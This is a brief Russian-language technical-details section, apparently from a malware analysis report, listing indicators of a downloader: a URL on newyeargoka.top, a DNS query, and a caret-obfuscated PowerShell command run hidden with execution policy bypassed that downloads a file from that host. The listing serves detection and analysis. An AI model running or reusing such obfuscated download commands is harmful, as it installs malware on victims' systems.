Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powER^SHELl.E^X^E -^E^xeC^uTIo^nP^olI^c^Y By^P^Ass ^-No^prOFIL^E -^wInDOW^STY^LE^ ^Hi^DdE^n^ (NEw-obJEct^ system.Net.WeBC^LIEN^t^).^D^O^wnlo^adFilE('http://newyeargoka...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "powER^SHELl.E^X^E -^E^xeC^uTIo^nP^olI^c^Y By^P^Ass ^-No^prOFIL^E -^wInDOW^STY^LE^ ^Hi^DdE^n^ (NEw-obJEct^ system.Net.WeBC^LIEN^t^).^D^O^wnlo^adFilE('http://newyeargoka...' (со скрытым окном)